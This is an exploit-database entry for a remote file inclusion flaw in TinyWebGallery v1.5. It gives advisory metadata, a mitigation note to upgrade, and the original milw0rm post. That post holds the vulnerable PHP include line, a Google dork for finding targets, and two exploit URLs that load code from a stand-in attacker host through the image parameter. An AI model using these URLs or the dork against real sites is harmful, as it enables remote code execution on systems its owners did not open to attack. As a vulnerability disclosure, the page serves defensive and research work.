header-logo
Suggest Exploit
vendor:
TinyWebGallery
by:
xoron
7,5
CVSS
HIGH
Remote Include Vulnerability
98
CWE
Product Name: TinyWebGallery
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

TinyWebGallery v1.5 ( image ) Remote Include Vulnerability

A vulnerability in TinyWebGallery v1.5 allows remote attackers to include arbitrary files via a URL in the image parameter to examples/image.php or examples/image.php2.

Mitigation:

Upgrade to the latest version of TinyWebGallery.
Source

Exploit-DB raw data:

####################################################
#                                                  #
#                                                  #
#           C Y B E R - W A R R i O R   T I M      #
#                                                  #
#                                                  #
####################################################


TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
------------------------------------------------------------------------------
Author: xoron
------------------------------------------------------------------------------
Script: TinyWebGallery
------------------------------------------------------------------------------
Class: Remote
------------------------------------------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------------------------------------------
CODE:

<?php
include ($image . ".txt");
?>

------------------------------------------------------------------------------
google dork: "powered by twg"
------------------------------------------------------------------------------

Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts

http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?

###########################################################################
#                                                                         #
#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends  #
#                                                                         #
###########################################################################

# milw0rm.com [2006-08-09]

Navigation

Suggest Exploit

Services By CQR